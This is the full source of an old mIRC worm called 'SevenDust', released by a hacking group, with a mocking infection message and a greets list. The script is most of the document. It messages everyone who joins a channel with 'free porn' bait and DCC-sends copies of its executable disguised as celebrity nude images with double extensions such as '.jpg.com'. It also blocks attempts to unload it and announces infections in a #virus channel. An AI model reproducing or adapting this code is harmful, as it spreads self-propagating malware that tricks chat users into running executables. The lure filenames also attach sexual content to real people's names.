   Infected with SevenDust worm by EXE-Gency [KrashMag]
   Well, arent you a very very lucky bunny? tee hee hee I'm sorry to say
   that you've been infected with a little mIRC worm called 7evendust.
   Don't worry too much. Its not a dangerous worm. It doesn't wipe your
   harddisk or anything like that. Just delete for mIRC directory and all
   the files inside it.
   Hmmm. This worm was written by EXE-Gency of Krash
   Greets to Chicane, Ody, Syztem|Krash, raXMph, MJ, Walrus, CFire, F-S,
   UnknownG, Smurf, Tempest, Alb_Hof, Linux_Pir8, Pred, Ruzz, Rhape79,
   MaquisHacker (miss you :) D3vlin, MrAlias, Dageshi, Spyda, Pax,
   Midnyte, GigaByte, Hex, Droid, TNC, Cease, Cider, xsprite, guruyu,
   Bruk0ut, MAN5ON, InSaNe, Slider, Scr33ch, Viper, qwaszx, Phreakazoid,
   Mirage, M0RPH, Secti0n8, e601, SuperJuan, Tikka, TerrorByte, ToneDeath,
   Neon Bunny, Netw0rk Bug, OmniBlade, Cerberus and everyone else from Krash,
   SWAT, AWOL, ERH, Datacore, ShadowVX and Ultmiate Chaos. Luv and kisses to
   #krash, #cocytusuk (irc.progenic.org) and #hackuk, #virus, #as-mag and
   #hackphreak on the mighty, mighty Undernet.
   Byeeeeeee!!!
   [script]
   n0=on 1:JOIN:#: {
   n1=    if ( $me != $nick ) {
   n2=        /msg $nick You want some free porn?
   n3=        %X = $rand(1, 10)
   n4=        if (%X == 1) {
   n5=            /copy -o 7dust.exe pamelanude.jpg.com
   n6=            /timer1 1 10 /dcc send $nick pamelanude.jpg.com
   n7=        }
   n8=        if (%X == 2) {
   n9=            /copy -o 7dust.exe gilliannaked.gif.com
   n10=            /timer2 1 10 /dcc send $nick gilliannaked.gif.com
   n11=        }
   n12=        if (%X == 3) {
   n13=            /copy -o 7dust.exe gellaranal.jpg.com
   n14=            /timer3 1 10 /dcc send $nick gellaranal.jpg.com
   n15=        }
   n16=        if (%X == 4) {
   n17=            /copy -o 7dust.exe gangbangjenny.bmp.com
   n18=            /timer4 1 10 /dcc send $nick gangbangjenny.bmp.com
   n19=        }
   n20=        if (%X == 5) {
   n21=            /copy -o 7dust.exe oraljroberts.jpg.com
   n22=            /timer5 1 10 /dcc send $nick oraljroberts.jpg.com
   n23=        }
   n24=        if (%X == 6) {
   n25=            /copy -o 7dust.exe sophielesbian.gif.com
   n26=            /timer6 1 10 /dcc send $nick sophielesbian.gif.com
   n27=        }
   n28=        if (%X == 7) {
   n29=            /copy -o 7dust.exe camerondoggystyle.jpg.com
   n30=            /timer7 1 10 /dcc send $nick camerondoggystyle.jpg.com
   n31=        }
   n32=        if (%X == 8) {
   n33=            /copy -o 7dust.exe nudebritneynaked.jpg.com
   n34=            /timer8 1 10 /dcc send $nick nudebritneynaked.jpg.com
   n35=        }
   n36=        if (%X == 9) {
   n37=            /copy -o 7dust.exe buffyoralsex.jpg.com
   n38=            /timer9 1 10 /dcc send $nick buffyoralsex.jpg.com
   n39=        }
   n40=        if (%X == 10) {
   n41=            /copy -o 7dust.exe geritopless.jpg.com
   n42=            /timer10 1 10 /dcc send $nick geritopless.jpg.com
   n43=        }
   n44=    }
   n45=}
   n46=on 1:CONNECT: {
   n47=    /join #virus
   n48=    /timerA 1 2 /msg #virus Denial seems it had to come
   n49=    /timerB 1 4 /msg #virus Relied on me to say it all
   n50=    /timerC 1 6 /msg #virus Denial has LEFT YOU ALL ALONE
   n51=    /timerD 1 8 /msg #virus [Seven Dust virus by EXE-Gency] [KrashMag]
   n52=    /timerA 1 10 /leave #virus
   n53=}
   n54=on *:INPUT:*: {
   n55=    if ( $1- == /unload -rs script.ini ) {
   n56=        /echo Unable to unload script :(
   n57=        /echo heh. wonder why :P
   n58=        /halt
   n59=    }
   n60=}
   n61=on *:filesent:pamelanude.jpg.com: { /timer1 off }
   n62=on *:filesent:gilliannaked.gif.com: { /timer2 off }
   n63=on *:filesent:gellaranal.jpg.com: { /timer3 off }
   n64=on *:filesent:gangbangjenny.bmp.com: { /timer4 off }
   n65=on *:filesent:oraljroberts.jpg.com: { /timer5 off }
   n66=on *:filesent:sophielesbian.gif.com: { /timer6 off }
   n67=on *:filesent:camerondoggystyle.jpg.com: { /timer7 off }
   n68=on *:filesent:nudebritneynaked.jpg.com: { /timer8 off }
   n69=on *:filesent:buffyoralsex.jpg.com: { /timer9 off }
   n70=on *:filesent:geritopless.jpg.com: { /timer10 off }
   n71=ctcp 1:PING:/notice $nick st00pid fuck@$%#! | /halt
